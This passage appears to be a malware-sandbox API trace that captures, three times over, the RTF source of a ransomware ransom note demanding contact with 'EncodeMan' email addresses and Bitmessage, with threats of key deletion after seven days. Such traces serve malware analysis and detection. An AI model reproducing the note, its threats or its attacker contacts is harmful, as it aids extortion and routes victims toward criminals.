decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.317] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.317] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r 